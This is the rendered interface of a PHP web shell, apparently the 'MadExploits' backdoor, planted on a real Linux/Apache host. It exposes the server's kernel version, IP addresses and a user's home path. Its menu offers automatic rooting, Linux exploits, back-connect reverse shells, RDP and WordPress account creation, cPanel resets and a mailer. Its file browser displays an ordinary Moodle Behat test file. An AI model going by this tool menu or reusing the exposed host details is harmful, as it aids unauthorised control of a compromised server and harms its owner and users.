Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.202
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
search /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
behat_search.php
5.68
KB
-rw-r--r--
search_by_user.feature
2.78
KB
-rw-r--r--
search_information.feature
1.73
KB
-rw-r--r--
search_query.feature
5.06
KB
-rw-r--r--
setup_search_engine.feature
1.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search_information.feature
@core @core_search Feature: Show system information in the search interface In order to let users know if there are current problems with search As an admin I need to be able to show information on search pages Background: Given the following config values are set as admin: | enableglobalsearch | 1 | | searchengine | simpledb | And I log in as "admin" @javascript Scenario: Information displays when enabled When the following config values are set as admin: | searchbannerenable | 1 | | searchbanner | The search currently only finds frog-related content; we hope to fix it soon. | And I search for "toads" using the header global search box Then I should see "The search currently only finds frog-related content" in the ".notifywarning" "css_element" @javascript Scenario: Information does not display when not enabled When the following config values are set as admin: | searchbannerenable | 0 | | searchbanner | The search currently only finds frog-related content; we hope to fix it soon. | And I search for "toads" using the header global search box Then I should not see "The search currently only finds frog-related content" And ".notifywarning" "css_element" should not exist @javascript Scenario: Information does not display when left blank When the following config values are set as admin: | searchbannerenable | 1 | | searchbanner | | And I search for "toads" using the header global search box Then ".notifywarning" "css_element" should not exist
Close